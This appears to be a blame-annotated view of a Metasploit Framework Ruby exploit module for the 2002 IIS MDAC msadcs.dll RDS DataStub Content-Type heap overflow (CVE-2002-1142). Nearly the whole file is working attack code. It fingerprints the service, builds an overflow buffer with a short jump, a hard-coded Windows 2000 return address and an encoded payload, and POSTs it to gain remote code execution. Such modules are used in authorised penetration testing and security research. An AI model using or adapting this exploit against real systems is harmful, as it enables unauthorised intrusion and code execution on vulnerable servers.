2012-06-07 11:02:13 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
|
2012-06-07 17:17:25 +00:00
|
|
|
'Description' => %q{
|
2012-06-07 11:02:13 +00:00
|
|
|
This module can be used to execute arbitrary code on IIS servers
|
|
|
|
that expose the /msadc/msadcs.dll Microsoft Data Access Components
|
|
|
|
(MDAC) Remote Data Service (RDS) DataFactory service. The service is
|
|
|
|
exploitable even when RDS is configured to deny remote connections
|
|
|
|
(handsafe.reg). The service is vulnerable to a heap overflow where
|
|
|
|
the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
|
|
|
|
Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
|
|
|
|
},
|
|
|
|
'Author' => 'patrick',
|
|
|
|
'Platform' => 'win',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['OSVDB', '14502'],
|
|
|
|
['BID', '6214'],
|
|
|
|
['CVE', '2002-1142'],
|
2012-10-22 20:34:47 +00:00
|
|
|
['MSB', 'MS02-065'],
|
2012-06-07 17:17:25 +00:00
|
|
|
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
|
2012-06-07 11:02:13 +00:00
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1024,
|
|
|
|
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0
|
|
|
|
[ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Nov 20 2002'
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PATH', [ true, "The path to msadcs.dll", '/msadc/msadcs.dll']),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = send_request_raw({
|
2012-11-08 16:42:48 +00:00
|
|
|
'uri' => normalize_uri(datastore['PATH']),
|
2012-06-07 11:02:13 +00:00
|
|
|
'method' => 'GET',
|
|
|
|
})
|
|
|
|
if (res and res.code == 200)
|
|
|
|
print_status("Server responded with HTTP #{res.code} OK")
|
|
|
|
if (res.body =~ /Content-Type: application\/x-varg/)
|
|
|
|
print_good("#{datastore['PATH']} matches fingerprint application\/x-varg")
|
|
|
|
Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
else
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
2012-06-07 17:17:25 +00:00
|
|
|
|
2012-06-07 11:02:13 +00:00
|
|
|
def exploit
|
|
|
|
sploit = rand_text_alphanumeric(136)
|
|
|
|
sploit[24,2] = Rex::Arch::X86.jmp_short(117)
|
|
|
|
sploit << [target['Ret']].pack('V')
|
|
|
|
sploit << payload.encoded
|
|
|
|
|
|
|
|
data = 'Content-Type: ' + sploit
|
2012-06-07 17:17:25 +00:00
|
|
|
|
2012-06-07 11:02:13 +00:00
|
|
|
res = send_request_raw({
|
2012-11-08 16:42:48 +00:00
|
|
|
'uri' => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query',
|
2012-06-07 11:02:13 +00:00
|
|
|
'headers' =>
|
|
|
|
{
|
|
|
|
'Content-Length' => data.length,
|
|
|
|
},
|
2012-06-07 17:17:25 +00:00
|
|
|
|
2012-06-07 11:02:13 +00:00
|
|
|
'method' => 'POST',
|
|
|
|
'data' => data,
|
|
|
|
})
|
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|